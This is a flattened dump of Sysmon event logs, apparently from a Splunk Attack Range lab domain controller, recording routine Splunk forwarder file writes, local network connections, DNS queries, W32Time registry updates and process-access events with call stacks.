Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7FEDF9125A8538DA1A13A949A1D6225,SHA256=3E2FA989F114858BCCCB3FC25D5FEE0EFF1CC325BF34658D0D0EBEC5E6669019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:47.598{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC66F4CD22F78E77BA32A02AFFE8343E,SHA256=154FCA540625D8406F65805F7CF2D8C18A1DE04AB7A10AFBC4F210CC709890A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.595{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55131-false10.0.1.12-8000- 23542300x80000000000000001695886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:48.614{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1069703F7DED91D424B8613EF81D6560,SHA256=087C6C1C7D32FEDFBD28E53BB9099E8BD118196B36B5323A658311F6B67F5127,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:49.629{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=158CA77D1D6CB117553EDDA732C046EA,SHA256=0BEEBFE9AF960D25FB74B9880459CB2555CA3D9BF84F9307A9FEF420E930F834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:50.645{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6558AF21986D1D6DACCBCF05FE435A12,SHA256=E64AFEFBAF44FE50B916A2130DDB03169DEFD91ED2BA1F3F87ECE03F64B8DE07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:50.348{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=233CBC564F21E7C9DD12FD70C7BCF9A4,SHA256=3E292280BAE7F854B5B0633F0C7FAEDAE5958FCCEACC0C5F89A2E3C797083D56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:51.664{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89129C70969F6A07AF0F1B9EAE2BF223,SHA256=FCA0CB25449B563A1C66F6F39B1B7D33293F754B89D1F7F4EC73991745316429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:51.369{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45114810AE6006966E7BE9F9D6ABFBC1,SHA256=0EC59BA09946DB1B6F111925BE8B64641683A4748F18FC5871121C4E72899C72,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:43.157{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local64227- 23542300x80000000000000001695895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:52.692{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D5AE8EA63B5C5DC82EB673068FFD24A,SHA256=2447CE8BF147E177BC974A36432D882D06CCB2CD20797FD4870A8185E669BFCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:44.407{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55132-false10.0.1.12-8000- 354300x80000000000000001695893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:44.172{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local64227- 23542300x80000000000000001695907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:53.708{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68598E731B6D519C92C72E3DE520AFE6,SHA256=A303FBF098F08E473984B7AB0E933DD8354E0FEBE7EC4CA66EC3EAA0E1C9693B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001695906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001695905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x10d049c4) 13241300x80000000000000001695904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d70ee5-0x5e5ac078) 13241300x80000000000000001695903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d70eed-0xc01f2878) 13241300x80000000000000001695902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d70ef6-0x21e39078) 13241300x80000000000000001695901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001695900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x10d049c4) 13241300x80000000000000001695899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d70ee5-0x5e5ac078) 13241300x80000000000000001695898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d70eed-0xc01f2878) 13241300x80000000000000001695897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-01 22:53:53.708{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d70ef6-0x21e39078) 23542300x80000000000000001695896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:53.489{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4EF7CEE23D21788A72C8A26EF26A8CC2,SHA256=61FADB90A1F0413CEBA845F9FB8531ABFFF7B2F919BA6465EAEFCBC28589659F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:54.869{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1BBAACC954C2B6A826C66005CE1A063,SHA256=7369EC028405A6EB7860FC39461CD06A1F0923547484A5ECB16B71CA6D45570C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:54.723{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B39BA743D601D10340246B6748F41BB2,SHA256=837492E32C9C6C599AF277FF033F7AF20E02040927CC74504A47D515D7828312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:55.754{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF359219A6ACBAF789D3F1F183242F45,SHA256=CA129696E717A179F4D3CD872EE492B734B3094FF1B75CDA3700FF2CDCE45DC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:56.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03B8DA267940650C43C5D148354D9795,SHA256=FEBB3DC1ABADBAD57D2E4E62501DEA5CF4D9B3E8E180BC96B4B56283E432C356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:56.463{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17F9BEB792B35AF0E35ED70A14ECDD47,SHA256=70DF67B966591B921A2F48941AAC0EC57BCD3D00FD18FB2DF6AE6312A14CF19F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:57.833{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6EF70DB0FA1164FFD1175DC0E03AAC,SHA256=1C45A340DB52EC9404CF19B35698258151AD463F2D1A98C9521E2BA5421B85AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:49.469{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55134-false10.0.1.12-8000- 23542300x80000000000000001695916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:58.848{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53FF2A2B0DB8086E482E91097117639B,SHA256=3D1C2C7B21AABF1CFBAC1118C3A876B4DB4767E29E23A4C1C5FAFAE9156B74F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:58.114{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20BC0F0F7FD5C9CB8DF416440BAD213F,SHA256=C4CFDFB7D5635B75EC9565375B2551A52438B3471DEE90A219EE52934D5277A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:59.873{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78A971E4C7F2A06102D5422827042F4,SHA256=AC97AE940031909DCC984A5FB9CA3C5EAFDEB573BD8DAA5B7C5BC9D84ADE1D1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:00.895{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78BF092A9B88935607231EE8E7E80496,SHA256=10B20768834036F40FF97D3CA5D7AD5BAE864929A565E8E07F9AFCBDAD7A2C1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:01.926{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B1B3D2FF62C65F85E44558B82C3E302,SHA256=E01EC893970BCE2AACEF3C3B60BB646119A55C948A140914DA56541AE3FBD883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:01.667{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:01.165{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B2D706EA4BB9723D7F278CA6A597D0F,SHA256=0BC8098166E710197CF98657F3A705B2DD385BEFACA43755416339F6D703D3FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:02.962{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D27CC097A59714413D279994F0AB6197,SHA256=C8AA9C6780106F8F892F04CD19F4DE8772328321EC5CC633796559803B6D321D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:02.665{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0C34BCD8E69D9F40F437DA5FCC701A1,SHA256=CB9FFE8B8772221FF3467FFBE3462859257303589F406C092CF859F79F1371AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:03.989{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16134411D1AD04F966038BFB38A36A96,SHA256=0A58DC3E2F362C6161A38176706DAA6A7AAAFE0FDFA0BFBBFD9FBCF0E100527A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:55.454{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55136-false10.0.1.12-8000- 354300x80000000000000001695924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:55.001{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55135-false10.0.1.12-8089- 10341000x80000000000000001695935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.598{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-708D-603D-6088-00000000AD01}8456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.598{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.598{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.598{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.598{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.598{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-708D-603D-6088-00000000AD01}8456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.598{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-708D-603D-6088-00000000AD01}8456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.599{05ADC7E1-708D-603D-6088-00000000AD01}8456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk 